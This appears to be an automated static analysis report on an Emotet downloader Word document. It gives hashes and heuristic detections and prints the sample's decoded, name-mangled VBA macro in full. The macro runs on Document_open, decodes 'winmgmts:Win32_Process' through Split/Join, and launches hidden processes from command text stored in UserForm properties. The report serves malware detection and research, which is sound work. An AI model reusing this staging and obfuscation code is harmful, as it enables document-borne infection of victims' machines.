Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 37211044dbd4ad8c…

MALICIOUS

Office (OLE)

Size: 200.3 KB
Created: 2019-12-18 23:23:00
Authoring application: Microsoft Office Word
First seen: 2020-05-14
MD5: 4432eb39a5f9126437dfebf97d11d313
SHA-1: b8503bc283d476544903dacee687265b7edbcc54
SHA-256: 37211044dbd4ad8c0eaa62af17737b76099852c994767f3c37d9b95fb2166181
Risk score: 232

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-7465038-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7465038-1
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER
    VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
    Matched line in script
    Yhtwsucjn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Dpjonrndf.Zldjjoofvb + "rocess"
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set Uvhjjoimxb = VBA.CreateObject(JJKBSKJ + Yhtwsucjn)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   10975 bytes
SHA-256: dcfcc895cb193cfa88679924d00ad9cc54b6c92b9502f6012e548a1e9c81c927
Detection
ClamAV: No threats found
Obfuscation or payload: likely
299 of 507 identifiers look randomly generated (e.g. 'Pcolfvvjhmwgn') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Dpjonrndf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Zldjjoofvb, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Tlcjlvmylqwab = Vqnqreweyqoqq
Mytpaewpzi = 205
Xdfgjvzbaee = ("Doloribus ullam.")
Wgetwfvmadyh = (883)
Dim Vyanhknza As Boolean
Dim Furjjiupvd As Integer
Dim Wcdkewagyxoe As Boolean
Dim Qwtgxfmjrkedq As Integer
Dim Spdxgekez As Boolean
Dim Alligmhk As Double
Dim Vpgrfnltgbfec As String
Kgvvfstxu = (719)
Dim Xjerwgeh As String
Xgbqzkti = ("Vel.")
Jeavglolfbsl = (211)
Dim Pcpofyauk As Boolean
Aueghaowjqt = Lkrsbuiluv
Vedyuotthfqke = Dobpwtgc
Htqybfzck = "Amet impedit qui."
Lyobzoafthoet = 203
   Zwifyhcpkoqtp = Oqtsfqheexxuh
Ynkrujyxcg = 889
Catvtcklvqzs = ("Voluptate autem maiores ut.")
Sdiamvhypdjy = (207)
Dim Qtqlkvfdkbe As Integer
Dim Vqhnrhcrvpcuz As Boolean
Dim Kqmuouvc As Integer
Dim Holosgvuxlh As Integer
Dim Rqkyudorlib As Integer
Dim Okdczohzjtrc As Integer
Dim Hzbcwcbvde As Boolean
Ylwwgkvz = (662)
Dim Rultaphxtv As String
Gsjfeqstgyfy = ("Asperiores id dolorum natus libero veritatis molestiae amet quia.")
Dnnggdrvihqcc = (81)
Dim Gkbideemaff As Integer
Esomeeltknood = Cpcngfaoep
Zbmabwtrpse = Zuvwmtatujkdr
Edkwsnmsxmns = "Dolorem."
Ukldpglesswl = 893
   Axtdxgltbjssx = Uhmwxlmjcma
Fnvgtjcwsws = 751
Afqkcwnqxjk = ("Sed velit.")
Loorqxrvn = (622)
Dim Myoqtcltwjk As Boolean
Dim Skdbzhdkhoxn As String
Dim Fvjsmrcy As Double
Dim Wwvyqcvbh As Integer
Dim Gtqwfjdejqdma As Boolean
Dim Mrxpqufvecmft As String
Dim Wfmczbsvghyt As String
Tkutsqddsfe = (811)
Dim Lttekaquxaxgw As String
Rhsblelsslbop = ("Rufus")
Gyydgbncnte = (983)
Dim Jwnvwhmkndps As String
Atjlbbkt = Tnudeehhi
Vyfshgctvi = Anjehcvkq
Cinifivik = "Et culpa magni eveniet."
Eudtuuhzdzhg = 12
Saztbwjqonfxd
End Sub

Attribute VB_Name = "Ixcwvnknjlj"
Attribute VB_Base = "0{4685CC4F-4C40-4F5D-9BF7-3E6538FBFF93}{C390043E-8603-44C2-BDA1-89CBF6781149}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Zlljqntwt"
Function Xxerdjkenbiax()
   Muqreidgf = Atcqbmeuqlw
Cnnxtdolhhwp = 896
Enjjoucvvpbhp = ("Ipsam voluptatem voluptatem.")
Kvpevoqugnc = (369)
Dim Tlfbuoah As Boolean
Dim Ivshrxvl As Boolean
Dim Vwmhklinscv As Double
Dim Zckkamayidtg As String
Dim Hzwlcoig As Integer
Dim Xqjfmoegwateh As Double
Dim Ynrntsabjbnv As String
Xmsflmkdvluy = (460)
Dim Ijcsiqdaqt As Double
Xoaezsnmy = ("Repellendus natus doloremque.")
Zwbkurgt = (184)
Dim Ptzyvmapw As String
Ceowdqmbkblvi = Hgijkaibhvagd
Wbrbwrnorbu = Ddxquzfugn
Udgbdkivxekeh = "Maiores non."
Tsrhpiyxd = 11
Wzwklzqxdngf = Dpjonrndf.Zldjjoofvb
   Eieyxlosciis = Ztgpmoqryhjw
Vlflmjwqfpspt = 863
Xakibsourz = ("Cum dolorum voluptas mollitia modi molestiae.")
Mkxpbcqw = (238)
Dim Wgqwjorw As Double
Dim Zhagynhfgqnm As Integer
Dim Jfhzrndus As Integer
Dim Esejacvco As Boolean
Dim Krqnukpap As Boolean
Dim Kndgrejr As Boolean
Dim Fbtucwgnsko As Double
Vpjesses = (159)
Dim Birftlrswyre As Integer
Srnjmxyohjiqi = ("Aperiam similique et.")
Zawagrmlrmc = (75)
Dim Remrzmlafvfi As Double
Ahxdcqcxxve = Fgwwkvgwd
Rwppteqsjem = Jzkptgqmphfu
Umprxkglgbmds = "Totam sit autem iure."
Aatccnklqc = 582
Mhjeqmjxjfotc = Wzwklzqxdngf + Ixcwvnknjlj.Dxsgnookgu + Ixcwvnknjlj.Eyklotir + Ixcwvnknjlj.Awwmxmfxppq
   Ihrwtzmbskyw = Motwcnppvebo
Phpjgqpx = 447
Sfixwdmruxaih = ("Ab modi dignissimos.")
Tdtlnuepmllv = (151)
Dim Seoavdxfrss As Boolean
Dim Umzgzhrmmw As Boolean
Dim Dnpwmliwbbsmi As String
Dim Uolasvjkc As String
Dim Lnxdficar As Boolean
Dim Jfgkujstm As Boolean
Dim Dxybvteudnj As Integer
Uzywkjhu = (326)
Dim Ffuiaarjzfx As String
Fdnjwxmu = ("Repudiandae sit dicta nemo iusto libero.")
Gqvkvjdrtoksv = (231)
Dim Dtlejccjzt As Boolean
Alwcsfhnrfpvz = Ewpmhmxsdaq
Egvrcndgwlrno = Yepemnymjglk
Tccoljkjxtmt = "Audrey"
Lyztyduyk = 773
Iaouucamcqi = Mhjeqmjxjfotc + Ixcwvnknjlj.Knyhiywvd + Ixcwvnknjlj.Zqcilzsiatds.Factoid
   Cdxaznywkcss = Klnptcoytkks
Zwwzvwhnaman = 690
Jspifqopsnyc = ("Aut maxime omnis.")
Kmqhjexn = (409)
Dim Wiowlboghuoa As Integer
Dim Mofkdibt As String
Dim Dnwsdpxv As Double
Dim Lxbrdrysujojs As Integer
Dim Vzmkxsdpltyf As Integer
Dim Sxtpyqpm As Boolean
Dim Mkiyjotvh As Double
Qklndihqy = (244)
Dim Cpclvutxfi As Double
Ynjefwzdx = ("Leticia")
Bnhbvihwpaah = (272)
Dim Ytzbkrzednau As String
Uycoevby = Ypymwfygqjhc
Ngtwjuba = Bqylcxuzf
Utnixotd = "Tempore."
Rzabyceotqxl = 492
Xxerdjkenbiax = Kunnxvwc + Iaouucamcqi + Kunnxvwc
   Hzrmgqkfky = Dijqnwglfozf
Omtmbpbzmeaax = 705
Ekdthvzor = ("Magnam.")
Oqhtzlngbx = (317)
Dim Wkrevfqmzygad As Boolean
Dim Reoxctqbks As String
Dim Omrhgtmhj As Double
Dim Ejaflqjhpdzw As Double
Dim Aiegjglbab As String
Dim Qzgrpcbmk As String
Dim Oekbldbp As Boolean
Ugkibakfciz = (215)
Dim Zjayoxvq As Integer
Gpbyeayzmkt = ("Brent")
Wiobrgifcjbl = (422)
Dim Emruystdsz As Integer
Fdimujdpe = Vdjsidgz
Ptnupvdasp = Lbfwqorhbgomw
Zkzmaospkvs = "Numquam numquam."
Zolamvsinln = 365
End Function
Function Saztbwjqonfxd()
   Ajtnwknljrn = Fgeilnbjmqcgl
Kkmaxiarx = 869
Yjpcockiwq = ("Est repellat dolorem.")
Qdagnsrhk = (305)
Dim Bzenxnfpg As Boolean
Dim Ostjcawc As Boolean
Dim Cewxwbmygwzu As Integer
Dim Djomvrabaoo As Boolean
Dim Dqrkhumyuiq As Double
Dim Trzibunegs As String
Dim Hsradhiooi As Integer
Lrzsqiaymjx = (609)
Dim Smuujxxf As String
Cvxrbhmx = ("Frankie")
Kwkuvnyrmw = (996)
Dim Hyluotflkjkr As Double
Srzqammarvcaz = Fsebhnzfgtssz
Mswyugsw = Hhhprnujmf
Ppjtltxhu = "Voluptatem et voluptates."
Qjkdaasn = 231
hb32bmmejdn = "23nNNgi3_7&&jjNN#"
Yhtwsucjn = Join(Split("23nNNgi3_7&&jjNN#" + "win23nNNgi3_7&&jjNN#mg23nNNgi3_7&&jjNN#mt23nNNgi3_7&&" + "jjNN#s:23nNNgi3_7&&jjNN#Wi23nNNgi3_7&&jjNN#n323" + "nNNgi3_7&&jjNN#2_23nNNgi3_7&&jjNN#", hb32bmmejdn), "") + Dpjonrndf.Zldjjoofvb + "rocess"
   Ebkdamwwelhgs = Ezzxsror
Rghhvqwy = 276
Bhiynyja = ("Facilis quo.")
Rrhwjjjzke = (16)
Dim Yaifppiuli As String
Dim Dxqakthnwzla As Double
Dim Xmhwnnlqii As Integer
Dim Jtrabjrot As Boolean
Dim Iprwdnzohger As Integer
Dim Oulhmoikdko As Boolean
Dim Xcilsmuyhwqic As Double
Iafbvnnofggw = (219)
Dim Mgihsbmzvlfcp As Integer
Uzjfpccemaikn = ("Hic provident.")
Lqkavpia = (415)
Dim Gjetwtygp As Integer
Xruvjcvhj = Wraproljmyyxi
Kqhkdyrwnyqem = Sbqinntgbj
Yjztlclrf = "Saepe ex."
Naeumqbkzxzfx = 677
Set Uvhjjoimxb = VBA.CreateObject(JJKBSKJ + Yhtwsucjn)
   Hocpwrvr = Tdexiiqshq
Dpclqfoug = 543
Dsfhhggf = ("Sed.")
Wkzlaxxznac = (535)
Dim Knmlbpdd As Boolean
Dim Daecaimakt As Double
Dim Edzqiqvtj As Boolean
Dim Svuvufqc As String
Dim Avlvvwqbzrhh As String
Dim Jmkhmhlafx As String
Dim Gnrvuqjqe As String
Unufrjgvlsl = (344)
Dim Ujqcfzqnj As Boolean
Ckewqxmebxq = ("Cupiditate.")
Ctrycbovbibl = (146)
Dim Kerblyech As Double
Enfgkkdoyz = Skizuabckq
Akwfvnzm = Ynjpryxwchy
Qdyjcfczowdfa = "Similique recusandae quia qui."
Tkzzwemuqfidf = 205
Qgurnyzimc = Yhtwsucjn + Ixcwvnknjlj.Prjvwtngmkbam.ControlTipText + Ixcwvnknjlj.Skwxrnwv.ControlTipText
   Paenutzhdj = Oamtadnqrfeku
Kyoptbvxcepm = 927
Txxghrls = ("Vero sunt doloribus perspiciatis omnis ex eius quo.")
Vtlrjwts = (885)
Dim Oiptlwtckolrx As Integer
Dim Hhengksqkuzqd As String
Dim Kxprolidv As Double
Dim Iiusdwxtcopfp As Integer
Dim Sezlgppedobgz As Double
Dim Djcibkvrqdskl As Double
Dim Radssdejeitd As Double
Cpxgdlgdh = (32)
Dim Wnihnedmiw As Integer
Huvyzxzh = ("Rerum et.")
Mnoueifoo = (17)
Dim Gvqwbqdprhi As String
Plhnhfhefr = Tsavguhimbye
Hwspxembesash = Lbeqbixduk
Tzomdkjx = "Eos quasi."
Qtvirohuon = 790
Jyiooqlvuhgf = Qgurnyzimc + Dpjonrndf.Zldjjoofvb
   Xyiudxnurdzqr = Noinoosqhrcv
Vszlxfef = 875
Ekorwdlnprhn = ("Arlene")
Blehbcbczrwkz = (501)
Dim Hqhaojezaueg As Boolean
Dim Wvilcjmaw As Integer
Dim Sckxvldgti As Boolean
Dim Msnxlenxwmvcv As Integer
Dim Xvggtdpvgtcei As Integer
Dim Vyvwvtom As Boolean
Dim Jgoggibhmfkmb As String
Wwhdiaewwqxgz = (738)
Dim Jjfkkwaoa As Integer
Xwvqiwoa = ("Soluta at.")
Hitwekspibbog = (287)
Dim Hrvywhgs As Integer
Hagibrzt = Bmogmizs
Iqapbetbcoapm = Kmhhkcvwszvdp
Iojhurzqgwy = "Pearl"
Ublavjbvrlz = 641
Set Saztbwjqonfxd = CreateObject(Jyiooqlvuhgf)
   Ausacwsyhc = Bxhfaficgyy
Kxygdoumixi = 105
Hzbryqzlotn = ("Nihil facilis enim saepe repudiandae quibusdam reprehenderit.")
Xzxebwpkrzu = (486)
Dim Nbcszybm As String
Dim Bpzheewdkk As Boolean
Dim Vpdvlodqagz As String
Dim Xivtouaz As Boolean
Dim Pcolfvvjhmwgn As Integer
Dim Mmigiuqef As Integer
Dim Akwpqretotxdy As String
Wrigrvgob = (385)
Dim Tibyxifiulnr As Boolean
Bualpjjld = ("Rerum praesentium totam et.")
Vzobuvuixywrp = (318)
Dim Ypasjambqag As Double
Yihedabjqh = Tjzgfckpaku
Oyjxyanshj = Rnpuehhacqq
Kxwnmnoxupcr = "Est dolorem commodi nulla quod."
Hmylzkpopuvv = 940
Saztbwjqonfxd.XSize = False
   Nxpqixfbmnkfg = Logjqlucpdse
Nmbwnsnj = 81
Jlfvwlne = ("At cum animi exercitationem sed odio eum.")
Huxicnsuznpt = (643)
Dim Zajisrfc As String
Dim Zefygepo As Double
Dim Tsotuazsj As String
Dim Qhfwvcflnqf As Double
Dim Ixhtovxauxgh As Double
Dim Osrmswqjxac As Double
Dim Kckpowuk As Double
Gdnemwkyojmr = (416)
Dim Dmzezagqetnyk As Boolean
Lrfrzlifrdnm = ("Et et molestiae maiores.")
Aptiombwqlv = (127)
Dim Ztrolcfdshz As Integer
Vghamnecde = Vvroauwnvjm
Bkwkihupdqu = Yignvoxyqgo
Ndfpluhlldir = "Aspernatur."
Zasewakvoginx = 299
Saztbwjqonfxd.YSize = False
   Scbnzkmwbg = Tvswwflntqnmt
Ohswunvjyhyf = 772
Xmjavjzbena = ("Aut eligendi assumenda explicabo.")
Rbopuapyo = (158)
Dim Mkxmtoxayz As Integer
Dim Dlxowmdf As String
Dim Gehjreexoid As Boolean
Dim Lmnhppaggvx As String
Dim Wltmldpw As Integer
Dim Ekxtvblmafym As Boolean
Dim Enqvjzikzn As String
Dcxzjqhtixsv = (99)
Dim Vixffkjkh As Boolean
Tnejuljldyi = ("Allison")
Vheizguu = (985)
Dim Eznthxjsu As Integer
Pcdkomjkbg = Wkyfakadsdjz
Rbntfoqnf = Yltlkpxr
Ijsihtvtmtd = "Amet autem iure."
Uhwhbycif = 270
Do While Uvhjjoimxb.Create(UJNDB & Xxerdjkenbiax, Kiluwjoybw, Saztbwjqonfxd, Tbthmthix)
Loop
   Rgibleorrsgx = Nvrouofrf
Kubhwvyc = 95
Wyddeesdkwd = ("Et.")
Artevinza = (432)
Dim Bjnjvxhvssrwn As Integer
Dim Knouhagoapc As Double
Dim Tcnvugbu As String
Dim Hnoilnjug As Integer
Dim Yalgwxuvm As Integer
Dim Gfbpevcgjvsf As String
Dim Tsvaruwwx As String
Coyjgzfo = (855)
Dim Jhvinszkj As Boolean
Ezcezuuzwjif = ("Voluptatem repellendus quos nulla.")
Gexcwnqs = (372)
Dim Lzrecwmnpg As Boolean
Vehfkprxbbi = Nchnrelzs
Cpwawupg = Jsvrdbacijrl
Tfzycmqckgc = "Delectus quos."
Raglbboejlwo = 400
End Function